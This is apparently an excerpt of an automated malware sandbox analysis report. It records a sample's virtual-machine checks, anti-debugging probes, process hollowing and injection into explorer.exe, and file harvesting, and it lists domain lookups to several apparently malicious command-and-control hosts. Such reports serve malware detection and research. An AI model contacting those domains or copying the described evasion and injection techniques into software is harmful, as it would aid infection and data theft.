                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Users\user\AppData\Roaming\irbiwatKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                    Source: C:\Windows\explorer.exe TID: 5332Thread sleep time: -41200s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 5356Thread sleep time: -39500s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 5224Thread sleep time: -33200s >= -30000s
                    Source: C:\Windows\explorer.exe TID: 5232Thread sleep time: -33800s >= -30000s
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 580
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 412
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 395
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 450
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\freebl3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeDropped PE file which has not been started: C:\Users\user\AppData\LocalLow\softokn3.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeRegistry key enumerated: More than 173 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040ABD8 LocalAlloc,LocalFree,LocalAlloc,GetLogicalDriveStringsW,GetLogicalDriveStringsW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeAPI call chain: ExitProcess graph end node
                    Source: E69F.exe, 00000023.00000003.478816889.000000000054A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWlW%SystemRoot%\system32\mswsock.dll*
                    Source: explorer.exe, 00000004.00000000.256230443.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                    Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*^d
                    Source: explorer.exe, 00000004.00000000.247962975.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&280b647&
                    Source: explorer.exe, 00000004.00000000.277925084.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                    Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}oy
                    Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}t]
                    Source: explorer.exe, 00000004.00000000.252178426.00000000062C4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: explorer.exe, 00000004.00000000.249598088.0000000004287000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0
                    Source: A658.exe, 0000001C.00000002.496916478.000000000088B000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460901218.000000000088B000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000003.479074188.0000000000572000.00000004.00000020.00020000.00000000.sdmp, E69F.exe, 00000023.00000002.578384942.0000000000575000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}^
                    Source: explorer.exe, 00000004.00000000.286096481.000000000820E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                    Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWh
                    Source: explorer.exe, 00000004.00000000.257346804.00000000083E5000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: p\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                    Source: A658.exe, 0000001C.00000002.495884561.0000000000837000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\oy.F
                    Source: A658.exe, 0000001C.00000002.496916478.000000000088B000.00000004.00000020.00020000.00000000.sdmp, A658.exe, 0000001C.00000003.460901218.000000000088B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWMp
                    Source: explorer.exe, 00000004.00000000.256230443.00000000080ED000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                    Source: explorer.exe, 00000004.00000000.256626129.0000000008223000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00l
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeProcess information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004092CF LocalAlloc,LocalAlloc,LocalAlloc,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,lstrlen,lstrcpyn,lstrcpyn,GetSystemInfo,wsprintfW,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004052DA LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,PathCombineW,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00405B5B LocalAlloc,StrCpyW,lstrlenW,FindFirstFileW,FindFirstFileW,LocalFree,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,StrCpyW,LocalAlloc,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,StrRChrW,StrCpyW,lstrlenW,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,CopyFileW,CreateFileW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,GetFileSize,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040196E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,StrStrW,StrStrW,LocalAlloc,PathCombineW,lstrlenW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040B177 LocalAlloc,StrCpyW,FindFirstFileW,FindFirstFileW,LocalAlloc,PathCombineW,LocalFree,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalAlloc,lstrlenW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CloseHandle,DeleteFileW,LocalAlloc,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,FindNextFileW,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00401B05 FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,StrStrW,lstrlenW,lstrlenW,LocalAlloc,PathCombineW,LocalFree,lstrlenW,FindNextFileW,FindNextFileW,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040AE06 LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrcmpW,StrCpyW,StrCpyW,FindFirstFileW,FindFirstFileW,LocalFree,LocalFree,lstrcmpW,lstrcmpW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,LocalAlloc,SHGetSpecialFolderPathW,lstrlenW,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,WideCharToMultiByte,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,LocalFree,DeleteFileW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindNextFileW,LocalFree,LocalFree,FindClose,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00403C8F StrStrW,StrStrW,StrStrW,lstrlenW,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,LocalAlloc,lstrlenW,LocalAlloc,LocalAlloc,StrStrW,StrStrW,LocalAlloc,PathCombineW,LocalAlloc,FindFirstFileW,FindFirstFileW,StrStrW,LocalAlloc,StrCpyW,StrRChrW,StrRChrW,LocalAlloc,PathCombineW,LocalFree,LocalFree,FindNextFileW,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,StrStrW,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00401E18 LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,PathCombineW,StrCpyW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,wsprintfW,PathCombineW,FindFirstFileW,FindFirstFileW,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040633E FindFirstFileW,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalFree,FindNextFileW,FindNextFileW,FindClose,lstrlenW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004039D7 LocalAlloc,FindFirstFileW,lstrcmpW,LocalAlloc,PathCombineW,LocalAlloc,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,StrCpyW,WideCharToMultiByte,LocalAlloc,LocalAlloc,WideCharToMultiByte,StrCpyW,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteFileW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00406725 LocalAlloc,StrCpyW,StrCpyW,FindFirstFileW,LocalAlloc,PathCombineW,lstrcmpW,LocalAlloc,LocalAlloc,LocalAlloc,StrCpyW,StrCpyW,StrCpyW,LocalAlloc,LocalAlloc,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,lstrlenW,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0043A390 FindFirstFileW,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0043A448 FindFirstFileW,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeSystem information queried: ModuleInformation

                    Anti Debugging

                    barindex
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Roaming\irbiwatSystem information queried: CodeIntegrityInformation
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00408ADD LocalAlloc,GetDesktopWindow,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LocalAlloc,GetClientRect,SetStretchBltMode,GetSystemMetrics,StretchBlt,GetSystemMetrics,StretchBlt,SelectObject,GetObjectW,LocalAlloc,CreateFileW,CreateFileW,LocalAlloc,LocalAlloc,StrCpyW,WideCharToMultiByte,WideCharToMultiByte,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,LocalAlloc,LocalAlloc,StrCpyW,LocalAlloc,WideCharToMultiByte,WideCharToMultiByte,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,DeleteObject,DeleteObject,
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_040E092B mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Roaming\irbiwatCode function: 17_2_040E0D90 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0058092B mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_00580D90 mov eax, dword ptr fs:[00000030h]
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_02340042 push dword ptr fs:[00000030h]
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeProcess queried: DebugPort
                    Source: C:\Users\user\AppData\Roaming\irbiwatProcess queried: DebugPort
                    Source: C:\Windows\SysWOW64\regsvr32.exeMemory protected: page write copy | page execute and write copy | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: C:\Windows\explorer.exeDomain query: cucumbetuturel4.com
                    Source: C:\Windows\explorer.exeDomain query: susuerulianita1.net
                    Source: C:\Windows\explorer.exeDomain query: linislominyt11.at
                    Source: C:\Windows\explorer.exeDomain query: moroitomo4.net
                    Source: C:\Windows\explorer.exeDomain query: monsutiur4.com
                    Source: C:\Windows\explorer.exeDomain query: nusurionuy5ff.at
                    Source: C:\Windows\explorer.exeDomain query: nunuslushau.com
                    Source: C:\Windows\explorer.exeFile created: D0E3.dll.4.drJump to dropped file
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Roaming\irbiwatSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                    Source: C:\Users\user\AppData\Roaming\irbiwatSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeMemory written: C:\Users\user\AppData\Local\Temp\A658.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeMemory written: C:\Users\user\AppData\Local\Temp\A658.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeCode function: 27_2_02340110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                    Source: C:\Users\user\Desktop\5tLwjRFzAW.exeThread created: C:\Windows\explorer.exe EIP: 2651B44
                    Source: C:\Users\user\AppData\Roaming\irbiwatThread created: unknown EIP: 4911B44
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeSection unmapped: unknown base address: 400000
                    Source: C:\Users\user\AppData\Local\Temp\33.exeSection unmapped: unknown base address: 400000
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: C:\Users\user\AppData\Local\Temp\A658.exe C:\Users\user\AppData\Local\Temp\A658.exe
                    Source: C:\Users\user\AppData\Local\Temp\A658.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\33.exeProcess created: unknown unknown
                    Source: C:\Users\user\AppData\Local\Temp\33.exeProcess created: unknown unknown
                    Source: explorer.exe, 00000004.00000000.247967959.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.277893318.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.265408523.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
                    Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.285756864.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.268554324.0000000005920000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                    Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                    Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                    Source: explorer.exe, 00000004.00000000.247981840.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.265429661.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.277925084.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
                    Source: explorer.exe, 00000004.00000000.248208574.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.278343187.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.265751910.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: LocalAlloc,LocalAlloc,LocalAlloc,GetLocaleInfoW,GetUserDefaultLCID,GetLocaleInfoW,wsprintfW,LocalFree,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: __crtGetLocaleInfoW_stat,_LocaleUpdate::~_LocaleUpdate,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: ___crtGetLocaleInfoW,___crtGetLocaleInfoW,__nh_malloc_dbg,___crtGetLocaleInfoW,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,___crtGetLocaleInfoW,_isdigit,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_004092CF cpuid
                    Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040919C LocalAlloc,GetTimeZoneInformation,LocalAlloc,wsprintfW,LocalFree,
                    Source: C:\Users\user\AppData\Local\Temp\28E9.exeCode function: 20_2_0040A672 LocalAlloc,GetUserNameW,

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 0000001F.00000002.502148462.0000000004CD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000023.00000002.596787162.00000000023C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.295278143.0000000004271000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000000.278637701.0000000002651000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.294702276.0000000002690000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343191676.00000000040F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000011.00000002.343211043.0000000004111000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.14.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.11.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.20.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.17.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.14.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.20.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 20.3.28E9.exe.4d2d13.5.unpack, type: UNPACKEDPE
